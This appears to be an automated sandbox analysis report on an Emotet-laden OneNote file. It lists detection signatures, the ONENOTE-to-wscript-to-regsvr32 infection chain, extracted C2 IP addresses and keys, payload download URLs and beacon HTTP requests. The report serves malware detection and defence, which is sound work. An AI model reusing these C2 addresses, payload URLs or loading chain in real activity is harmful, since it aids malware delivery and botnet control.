
Windows Analysis Report
Insight_Medical_Publishing_3.one

Overview

General Information

Sample Name:Insight_Medical_Publishing_3.one
Analysis ID:828495
MD5:0d8f675a79a32d286f8eccb2ff989c91
SHA1:e0796075d09841386c12f37503495c9624a3c393
SHA256:7ef31d3538810c895812e331db91f905693b99b682d062d9d0b4dab5df0da0a2
Tags:one
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • ONENOTE.EXE (PID: 5852 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_3.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 4976 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 4920 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 3156 cmdline: "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 1652 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup
Name: Emotet
Description: While Emotet historically was banking malware organized in a botnet, nowadays it is mostly seen as infrastructure-as-a-service for content delivery. For example, since mid-2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It still steals information from victims, but the criminal gang behind it opened up another business channel by selling their infrastructure to deliver additional malicious software. Malware analysts have classified it into epochs depending on command and control, payloads, and delivery solutions, which change over time. Emotet was taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
Attribution:
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5OWVpqQATAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2gGXgqQAuAJA="]}
Source: Insight_Medical_Publishing_3.one, Rule: JoeSecurity_MalOneNote, Description: Yara detected Malicious OneNote, Author: Joe Security
    Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Author: Arnim Rupp, Strings:
    • 0x38fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x3a1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x962:$jsp4: public
    • 0xfa2:$jsp4: public
    • 0x1e6a:$jsp4: public
    • 0x2822:$jsp4: public
    • 0x2e62:$jsp4: public
    • 0x4322:$jsp4: public
    • 0x4962:$jsp4: public
    • 0x61c:$asp_payload11: wscript.shell
    • 0x24dc:$asp_payload11: wscript.shell
    • 0x3fdc:$asp_payload11: wscript.shell
    • 0x204:$asp_multi_payload_one1: createobject
    • 0x2f2:$asp_multi_payload_one1: createobject
    • 0x36a:$asp_multi_payload_one1: createobject
    • 0x3c4:$asp_multi_payload_one1: createobject
    • 0x600:$asp_multi_payload_one1: createobject
    • 0xd66:$asp_multi_payload_one1: createobject
    • 0x20c4:$asp_multi_payload_one1: createobject
    • 0x21b2:$asp_multi_payload_one1: createobject
    • 0x222a:$asp_multi_payload_one1: createobject
    Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Author: Arnim Rupp, Strings:
    • 0x4ce:$asp_gen_obf1: "+"
    • 0x4fe:$asp_gen_obf1: "+"
    • 0x238e:$asp_gen_obf1: "+"
    • 0x23be:$asp_gen_obf1: "+"
    • 0x3e8e:$asp_gen_obf1: "+"
    • 0x3ebe:$asp_gen_obf1: "+"
    • 0x38fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x3a1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x962:$jsp4: public
    • 0xfa2:$jsp4: public
    • 0x1e6a:$jsp4: public
    • 0x2822:$jsp4: public
    • 0x2e62:$jsp4: public
    • 0x4322:$jsp4: public
    • 0x4962:$jsp4: public
    • 0x2e2:$asp_input1: request
    • 0xb10:$asp_input1: request
    • 0xb52:$asp_input1: request
    • 0xc68:$asp_input1: request
    • 0x21a2:$asp_input1: request
    • 0x29d0:$asp_input1: request
    Source: 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Author: Arnim Rupp, Strings:
    • 0xe066:$asp_gen_obf1: "+"
    • 0xe096:$asp_gen_obf1: "+"
    • 0x154ce:$asp_gen_obf1: "+"
    • 0x154fe:$asp_gen_obf1: "+"
    • 0x1738e:$asp_gen_obf1: "+"
    • 0x173be:$asp_gen_obf1: "+"
    • 0x18e8e:$asp_gen_obf1: "+"
    • 0x18ebe:$asp_gen_obf1: "+"
    • 0x8f00:$tagasp_short2: %>
    • 0x188fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x18a1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0xe4fa:$jsp4: public
    • 0x15962:$jsp4: public
    • 0x15fa2:$jsp4: public
    • 0x16e6a:$jsp4: public
    • 0x17822:$jsp4: public
    • 0x17e62:$jsp4: public
    • 0x19322:$jsp4: public
    • 0x19962:$jsp4: public
    • 0xde7a:$asp_input1: request
    • 0xe6a8:$asp_input1: request
    Source: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
      Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Author: Arnim Rupp, Strings:
      • 0xb8fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
      • 0xba1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
      • 0x14fa:$jsp4: public
      • 0x8962:$jsp4: public
      • 0x8fa2:$jsp4: public
      • 0x9e6a:$jsp4: public
      • 0xa822:$jsp4: public
      • 0xae62:$jsp4: public
      • 0xc322:$jsp4: public
      • 0xc962:$jsp4: public
      • 0x11b4:$asp_payload11: wscript.shell
      • 0x861c:$asp_payload11: wscript.shell
      • 0xa4dc:$asp_payload11: wscript.shell
      • 0xbfdc:$asp_payload11: wscript.shell
      • 0xd9c:$asp_multi_payload_one1: createobject
      • 0xe8a:$asp_multi_payload_one1: createobject
      • 0xf02:$asp_multi_payload_one1: createobject
      • 0xf5c:$asp_multi_payload_one1: createobject
      • 0x1198:$asp_multi_payload_one1: createobject
      • 0x18fe:$asp_multi_payload_one1: createobject
      • 0x8204:$asp_multi_payload_one1: createobject
      Source: 12.2.regsvr32.exe.1220000.0.raw.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
      Source: 12.2.regsvr32.exe.1220000.0.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
      Source: 11.2.regsvr32.exe.f10000.0.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
      Source: 11.2.regsvr32.exe.f10000.0.raw.unpack, Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security

              Malware Analysis System Evasion

              Source: Process started, Author: Joe Security, Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 4976, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll, ProcessId: 4920, ProcessName: regsvr32.exe
              Timestamp: 03/17/23-09:17:28.925917
              Source IP: 192.168.2.3
              Destination IP: 66.228.32.31
              SID:2404330
              Source Port:49686
              Destination Port:7080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp: 03/17/23-09:18:01.076339
              Source IP: 192.168.2.3
              Destination IP: 104.168.155.143
              SID:2404302
              Source Port:49694
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp: 03/17/23-09:17:34.182038
              Source IP: 192.168.2.3
              Destination IP: 182.162.143.56
              SID:2404312
              Source Port:49687
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp: 03/17/23-09:17:19.192203
              Source IP: 192.168.2.3
              Destination IP: 91.121.146.47
              SID:2404344
              Source Port:49684
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp: 03/17/23-09:17:48.416747
              Source IP: 192.168.2.3
              Destination IP: 167.172.199.165
              SID:2404308
              Source Port:49689
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected

              AV Detection

              Source: Insight_Medical_Publishing_3.one, ReversingLabs: Detection: 30%
              Source: Insight_Medical_Publishing_3.one, Virustotal: Detection: 41%
              Source: penshorn.org, Virustotal: Detection: 10%
              Source: https://159.89.202.34/, Virustotal: Detection: 18%
              Source: http://softwareulike.com/cWIYxWMPkK/, Virustotal: Detection: 16%
              Source: C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll, ReversingLabs: Detection: 58%
              Source: C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy), ReversingLabs: Detection: 58%
              Source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Emotet (C2 list and public keys as reproduced in the Classification section above)
              Source: unknown, HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49683 version: TLS 1.2
              Source: unknown, HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49687 version: TLS 1.2
              Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: C:\Windows\System32\regsvr32.exe, Code function: 11_2_0000000180008D28 FindFirstFileExW,11_2_0000000180008D28

              Software Vulnerabilities

              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Process created: C:\Windows\SysWOW64\wscript.exe

              Networking

              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 164.90.222.65 443
              Source: C:\Windows\SysWOW64\wscript.exe, Network Connect: 203.26.41.131 443
              Source: C:\Windows\SysWOW64\wscript.exe, Domain query: penshorn.org
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 66.228.32.31 7080
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 187.63.160.88 80
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 104.168.155.143 8080
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 159.89.202.34 443
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 91.121.146.47 8080
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 160.16.142.56 8080
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 182.162.143.56 443
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 167.172.199.165 8080
              Source: C:\Windows\System32\regsvr32.exe, Network Connect: 163.44.196.120 8080
              Source: Traffic, Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.3:49687 -> 182.162.143.56:443
              Source: Traffic, Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49684 -> 91.121.146.47:8080
              Source: Traffic, Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.3:49686 -> 66.228.32.31:7080
              Source: Traffic, Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.3:49689 -> 167.172.199.165:8080
              Source: Traffic, Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.3:49694 -> 104.168.155.143:8080
              Source: Joe Sandbox View, ASN Name: RACKCORP-APRackCorpAU
              Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
              Source: global traffic, HTTP traffic detected:
                POST /qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ HTTP/1.1
                Connection: Keep-Alive
                Content-Length: 0
                Host: 182.162.143.56
              Source: Joe Sandbox View, IP Address: 110.232.117.186
              Source: global traffic, HTTP traffic detected:
                GET /admin/Ses8712iGR8du/ HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                Host: penshorn.org
              Source: global traffic, TCP traffic: 192.168.2.3:49684 -> 91.121.146.47:8080
              Source: global traffic, TCP traffic: 192.168.2.3:49686 -> 66.228.32.31:7080
              Source: global traffic, TCP traffic: 192.168.2.3:49689 -> 167.172.199.165:8080
              Source: global traffic, TCP traffic: 192.168.2.3:49694 -> 104.168.155.143:8080
              Source: global traffic, TCP traffic: 192.168.2.3:49695 -> 163.44.196.120:8080
              Source: global traffic, TCP traffic: 192.168.2.3:49696 -> 160.16.142.56:8080
              Source: unknown, Network traffic detected: IP country count 17
              Source: unknown, Network traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknown, Network traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49687
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknown, Network traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49692
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknown, Network traffic detected: HTTP traffic on port 49692 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknown, Network traffic detected: HTTP traffic on port 49691 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 49687 -> 443
              Source: unknown, TCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknown, TCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknown, TCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknown, TCP traffic detected without corresponding DNS query: 187.63.160.88
              Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
              Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
              Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
              Source: unknownHTTP traffic detected: POST /qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
              Source: unknownDNS traffic detected: queries for: penshorn.org
              Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
              Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49687 version: TLS 1.2

              E-Banking Fraud

Source: Yara match | File source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 12.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.regsvr32.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.regsvr32.exe.f10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.579427861.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.334703858.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated (date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic (date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06)
Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\ZLTlFkhzfcDaCjB\
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0000000180006818
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_000000018000B878
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0000000180007110
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0000000180008D28
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0000000180014555
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00EF0000
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5709C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4CC14
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5A000
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F47D6C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4263C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F48BC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F58FC8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F43CF4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F448FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F490F8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F520E0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F414D4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F53CD4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F418DC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4F8C4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F55CC4
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F480CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F508CC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5A8B0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F694BC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4DCB8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F498AC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4AC94
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F44C84
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5CC84
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F55880
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4D474
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F56C70
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4B07C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F42C78
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4C078
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5B460
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F65450
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5C058
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F47840
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5C44C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F51030
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5EC30
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F4B83C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F6181C
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F41000
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F49408
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F47C08
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5D5F0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F515C8
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F495BC
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5BDA0
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F47530
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5B130
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F46138
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F51924
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F54D20
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F5AD28
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F69910
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F57518
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00F68500
